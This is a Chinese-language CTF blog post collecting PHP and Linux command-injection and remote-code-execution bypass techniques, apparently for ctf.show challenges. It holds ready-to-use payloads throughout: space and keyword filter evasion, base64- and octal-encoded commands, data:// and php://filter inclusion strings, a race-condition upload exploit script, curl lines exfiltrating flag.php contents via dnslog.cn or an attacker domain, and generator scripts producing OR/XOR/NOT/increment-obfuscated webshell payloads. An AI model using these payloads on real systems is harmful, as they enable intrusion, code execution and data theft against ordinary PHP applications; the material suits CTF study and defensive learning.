写在开头可能会用到的提醒

  • ;可以用%0a来替换
  • ``是shell_exec的缩写
  • ls | tee 1 把ls的输出内容存入1这个文件
  • shell查看文件的几种方式,tac | more | less | tail | sort | tac | cat | head | od
  • 针对flag 可以用grep { flag.php来进行查看
  • 遇到文件包含可以用伪协议来读取
  • 遇到输出到黑洞,可以用双写绕过,ls;ls或者ls||ls或者ls%26%26ls,%26是&的url编码
  • <?= 就相当于<?php echo,<?=ls;
  • 日志注入,条件:post的eval,先用ua构造一个一句话访问,日志里存在一句话了;然后用include把日志给包含住
  • 存在eval(post),可以用post去include($_GET[a]),a=php伪协议
  • 输出可以用print_r var_dump
  • 获取文件包含的所有变量,include包含住文件,var_dump(get_defined_vars()),或者echo $变量
  • 获取页面源代码,搭配eval可以用,echo file_get_contents() | show_source() | highlight_file
  • 文件重命名函数rename('文件名','新文件名'),查看当前目录print_r(scandir('.'))
  • 利用环境变量来凑出shell命令,例如${PATH:~A}${PWD:~A}
  • linux的shell中两个单引号忽略,例如l''s或者"l""s"或者'l''s',单引号会被忽略
  • linux的shell中,查看文件可以用<代替空格,例如:cat<flag或者cat<>flag
  • linux的/bin目录下都是可以执行二进制文件,例如cat是/bin/cat,在一些题目可能需要用到/bin/cat这种
  • linux的shell的通配符,cat = /bin/ca[a-z]
  • 环境变量截取,在Linux下a=ca;${a}t flag.php 等同于 cat flag.php
  • linux命令另类执行方法,$(printf "ls") 等同于 $(printf "\154\163") 都是执行ls,\154\163为八进制
  • linux的shell如果过滤空格,可以用$IFS | ${IFS} | %09| < | <> | %0b | %0c绕过,%09是tab
  • linux的shell如果过滤空格,可以截取环境,例如执行命令env,会出现一堆命令。Linux命令:name="si bei";${name:2:1} 那么这样子就会出现空格,看图示例
    截取env
  • 命令执行的另类方式,在linux的shell中 `echo bHMK|base64 -d` 这样相当于ls,以此类推,可以构造任意字符。原理 `echo ls` 这样就相当于ls,echo ls|base64 这样可以把ls给base64,然后 `echo bHMK|base64 -d` 就相当于先base64解密,变为 `echo ls` ,就相当于执行了ls
  • 通过DNS通道关键信息传出来,dnslog.cn,例如curl `whoami` .dnslog.cn,那么就会解析为root.dnslog.cn,可以加密payload,例如/?cmd=a=cat flag.php|base64;curl `${a:0:10}` .dnslog.cn,这样慢慢带出来
  • 通过http通道把消息带出来,例如/?cmd=a= `cat flag.php|base64` ;curl your.domin/?a=${a:0:10},然后查看网站日志,把消息带出来

一些栗子

条件竞争

<?php

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

payload

上py脚本

import requests

url = "http://ae1c9002-23cb-4075-abb5-f41d8b00947c.challenge.ctf.show/?c=. /???/????????[@-[]"

file = {
    "c": b"#!/bin/sh\ncat flag.php"
}

req = requests.post(url=url, files=file)
print(req.text)

思路

对环境进行强制POST上传,会将上传的东西变为文件,强制临时保存在/tmp/php??????目录,??????代表随机大小写字母,php代码结束后会自动删除。如果我们在强制上传文件后,执行了系统命令,去执行我们上传的文件,就可以做到命令执行,形成了条件竞争。. 在linux中代表执行,. /???/????????[@-[],代表去/tmp下匹配临时文件了,最后面的[@-[]是linux的通配符,匹配a-z,可以在linux下自己试试/bin/ca[a-z] test.txt

简单过滤

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }

payload

/?c=system("cp fla?.php 1.txt");

思路

利用system函数,把flag文件复制为1.txt

简单过滤

if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
    eval($c);
}

payload

?c=`cp fla?.??? 1.txt`;

思路

利用``,把flag文件复制为1.txt

参数逃逸

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }  
}

payload

/?c=eval($_GET[a]);&a=system("cp fla* 1.txt");

思路

参数逃逸,eval嵌套eval,GET一个参数,在新参数里面赋值

复杂过滤

if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
    eval($c);
}

payload

/?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

思路解析

使用include或者require包含文件,空格被过滤使用%0a来换行,分号被过滤无法闭合就使用?> ,后面接前面设置的参数,使用Php伪协议,
php://filter/convert.base64-encode/resource=文件名

文件包含

if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
    include($c);
    echo $flag;

}

payload

?c=data://text/plain,<?php   system("cp fla?.php 1.txt");  ?>

思路

伪协议filter用不了,用data,执行函数

文件包含(短连接)

if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
    include($c);
    echo $flag;
}

payload

/?c=data://text/plain,<?=system("cp fla*.* 1.txt");  ?>

思路

把<?php 换成<?=

命令执行,复杂

if(isset($_GET['c'])){

$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
    eval($c);
}

payload

get ?c=eval(array_pop(next(get_defined_vars())));
post a=system("tac flag.php");

思路

  • 先print_r(get_defined_vars()); post传入a=要执行的函数
  • next(print_r(get_defined_vars())); next () 函数将内部指针指向数组中的下一个元素,并输出
  • arrar_pop(next(print_r(get_defined_vars()))); 把数组中的值打印出来
  • 然后eval(arrar_pop(next(print_r(get_defined_vars())))) post传入要执行的函数

eval扫目录脚本

c=?><?php
$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>
#记得url编码
#在eval点进行传入

命令执行,或 异或 取反 自增脚本

例题

<?php
error_reporting(0);
highlight_file(__FILE__);
$code=$_GET['code'];
if(preg_match('/[a-z0-9]/i',$code)){
    die('hacker');
}
eval($code);

或运算生成脚本

如何使用

将对应的代码丢进对应的文件,放到同一个文件夹。然后php [你的php文件],然后python [你的Py文件]

脚本

<?php
/* php脚本*/
/* author yu22x */

$myfile = fopen("or_rce.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) { 
    for ($j=0; $j <256 ; $j++) { 

        if($i<16){
            $hex_i='0'.dechex($i);
        }
        else{
            $hex_i=dechex($i);
        }
        if($j<16){
            $hex_j='0'.dechex($j);
        }
        else{
            $hex_j=dechex($j);
        }
        $preg = '/[0-9a-z]/i';//根据题目给的正则表达式修改即可
        if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
                    echo "";
    }
  
        else{
        $a='%'.$hex_i;
        $b='%'.$hex_j;
        $c=(urldecode($a)|urldecode($b));
        if (ord($c)>=32&ord($c)<=126) {
            $contents=$contents.$c." ".$a." ".$b."\n";
        }
    }

}
}
fwrite($myfile,$contents);
fclose($myfile);

# -*py脚本*-

# author yu22x

import requests
import urllib
from sys import *
import os
def action(arg):
   s1=""
   s2=""
   for i in arg:
       f=open("or_rce.txt","r")
       while True:
           t=f.readline()
           if t=="":
               break
           if t[0]==i:
               #print(i)
               s1+=t[2:5]
               s2+=t[6:9]
               break
       f.close()
   output="(\""+s1+"\"|\""+s2+"\")"
   return(output)
   
while True:
   param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";"
   print(param)

异或运算生成脚本

如何使用

将对应的代码丢进对应的文件,放到同一个文件夹。然后php [你的php文件],然后python [你的Py文件]

脚本

<?php

/*author yu22x*/
/*php脚本*/

$myfile = fopen("xor_rce.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) { 
    for ($j=0; $j <256 ; $j++) { 

        if($i<16){
            $hex_i='0'.dechex($i);
        }
        else{
            $hex_i=dechex($i);
        }
        if($j<16){
            $hex_j='0'.dechex($j);
        }
        else{
            $hex_j=dechex($j);
        }
        $preg = '/[a-z0-9]/i'; //根据题目给的正则表达式修改即可
        if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
                    echo "";
    }
  
        else{
        $a='%'.$hex_i;
        $b='%'.$hex_j;
        $c=(urldecode($a)^urldecode($b));
        if (ord($c)>=32&ord($c)<=126) {
            $contents=$contents.$c." ".$a." ".$b."\n";
        }
    }

}
}
fwrite($myfile,$contents);
fclose($myfile);

# -*-这是Py脚本*-

# author yu22x

import requests
import urllib
from sys import *
import os
def action(arg):
   s1=""
   s2=""
   for i in arg:
       f=open("xor_rce.txt","r")
       while True:
           t=f.readline()
           if t=="":
               break
           if t[0]==i:
               #print(i)
               s1+=t[2:5]
               s2+=t[6:9]
               break
       f.close()
   output="(\""+s1+"\"^\""+s2+"\")"
   return(output)
   
while True:
   param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";"
   print(param)

取反运算生成脚本

如何使用

将对应的代码丢进对应的文件,放到同一个文件夹。然后php [你的php文件]

脚本

<?php

fwrite(STDOUT,'[+]your function: ');

$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); 

fwrite(STDOUT,'[+]your command: ');

$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); 

echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';

自增运算脚本

如何使用

该方法在.0.12以上版本不可使用
构造出的语句为: assert($_POST[_]); 使用: _=php函数 ; 例如 _=phpinfo();

脚本

$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

最后修改:2022 年 11 月 11 日
如果觉得我的文章对你有用,请随意赞赏